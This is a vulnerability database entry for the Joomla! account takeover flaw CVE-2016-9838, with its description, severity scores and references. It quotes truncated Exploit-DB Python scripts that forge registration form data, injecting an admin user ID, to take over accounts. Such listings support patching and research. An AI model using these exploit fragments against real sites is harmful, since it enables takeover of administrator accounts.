CVE-2016-9838
Published 2016-12-16
Priority P359 · high · 7.5 (CVSS 3.0)
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EXPLOIT
EPSS 14.10% (96.1th percentile)
An issue was discovered in components/com_users/models/registration.php in Joomla! before 3.6.5. Incorrect filtering of registration form data stored to the session on a validation error enables a user to gain access to a registered user's account and reset the user's group mappings, username, and password, as demonstrated by submitting a form that targets the `registration.register` task.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | joomla_! | <= 3.6.4 | — |
CVSS provenance
nvd · v3.0 · 7.5 HIGH · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:P/A:N
No detection rules found.
Exploit-DB
Joomla! < 2.5.2 - Admin Creation
exploitdb·2017-01-20·CVSS 7.5
CVE-2012-1563 [HIGH] Joomla! < 2.5.2 - Admin Creation
---
```python
#!/usr/bin/python3
# CVE-2012-1563: Joomla! <= 2.5.2 Admin Creation
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests
import random
url = 'http://vmweb.lan/joomla-cms-2.5.2/'
form_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form'
action_url = url + 'index.php/using-joomla/extensions/components/users-component/registration-form?task=registration.register'
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@yopmail.com'
password = 'ActualRandomChimpanzee123'
user_data = {
    'name': username,
    'username': username,
    'password1': password,
    'password2': password + 'XXXinvalid',
    'email1': email,
    'email2': ema
```
Exploit-DB
Joomla! < 3.6.4 - Admin Takeover
exploitdb·2017-01-20·CVSS 7.5
CVE-2016-9838 [HIGH] Joomla! < 3.6.4 - Admin Takeover
---
```python
#!/usr/bin/python3
# CVE-2016-9838: Joomla! <= 3.6.4 Admin TakeOver
# cf
# Source: https://www.ambionics.io/blog/cve-2016-9838-joomla-account-takeover-and-remote-code-execution
import bs4
import requests
import random
ADMIN_ID = 384
url = 'http://vmweb.lan/Joomla-3.6.4/'
form_url = url + 'index.php/component/users/?view=registration'
action_url = url + 'index.php/component/users/?task=registration.register'
username = 'user%d' % random.randrange(1000, 10000)
email = username + '@yopmail.com'
password = 'ActualRandomChimpanzee123'
user_data = {
    'name': username,
    'username': username,
    'password1': password,
    'password2': password + 'XXXinvalid',
    'email1': email,
    'email2': email,
    'id': '%d' % ADMIN_ID
}
session = requests.Session()
# Grab original
```
http://www.securityfocus.com/bid/94893
https://www.exploit-db.com/exploits/41157/
https://www.joomla.org/announcements/release-news/5693-joomla-3-6-5-released.html
2016-12-16
Published